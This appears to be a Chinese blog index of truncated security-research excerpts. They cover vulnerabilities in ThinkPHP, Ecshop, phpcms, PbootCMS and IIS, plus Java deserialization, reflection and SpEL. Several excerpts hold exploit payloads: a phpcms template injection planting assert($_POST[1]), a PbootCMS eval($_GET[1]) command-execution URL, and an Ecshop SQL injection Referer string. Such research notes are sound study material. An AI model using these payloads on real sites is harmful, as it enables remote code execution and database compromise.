漏洞流程分析 入口文件App.php中的run()，实例化了一个$request对象传给了routeCheck() 跟进routeCheck()，查看路由检测规则 跟进check()，$method通过$request->method()获得，$rules根据$method获得不同的路由规则 ...

存在漏洞版本12Ecshop 2.xEcshop 3.x-3.6.0 sql注入1Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(e ...

漏洞复现123http://127.0.0.1/phpcms/type.php?template=tag_(){};assert($_POST[1]);{//../rsshttp://127.0.0.1/phpcms/data/cache_template/rss.tp ...

前台命令执行payload1234567http://www.pbootcms.com:82/index.php/index/index?s={pboot:if(eval($_GET[1]));//)})}}{/pboot:if}& ...

参考文献：https://xz.aliyun.com/t/2318​ https://www.jianshu.com/p/96cf08d569bc 解析器漏洞12345678910IIS 6.0：目录解析`/xx.asp/xx.jpg`，网站下建立文件夹的名字为 * ...

还是以ysoserial.jar为栗子，源码在github上有，包含pom.xml是通过maven打包的。 下载源码之后，右侧有个Maven，如下图，点击+导入pom.xml文件 点击导入的文件中的install安装需要的依赖 第一运行的话，记得添加运行环境，快捷键是ctrl+shift+alt+ ...

在以前的文章中有简单介绍过java的反射机制，但没有深入了解，补充一下。 反射：反射是 JVM 在运行时才动态加载类或调用方法/访问属性，它不需要事先(写代码的时候或编译期)知道运行对象是谁。主要功能是在运行时判断任意一个对象所属的类；在运行时构造任意一个类的对象；在运行时判断任意一个类所具有的成员 ...

源代码：https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar 解题步骤将下载下来的jar包放到jd-gui中，查看源代码。源码分析 META-INF文件夹中放的是：目录中的文件和目录获 ...

概念： JRE(Java运行环境)：所有的Java 程序都要在JRE下才能运行。 JDK：开发者编译、调试java程序用的开发工具包。JDK的工具也是Java程序，也需要JRE才能运行。在JDK的安装目录下有一个名为jre的目录，用于存放JRE文件。 JVM(Java虚拟机)是JRE的一部分。它是一 ...

参考文献：EL语法介绍：https://www.cnblogs.com/czs1982/p/3966748.htmlSpEl：http://rui0.cn/archives/1043CVE-2018-1270：https://github.com/CaledoniaProject/CVE-2018- ...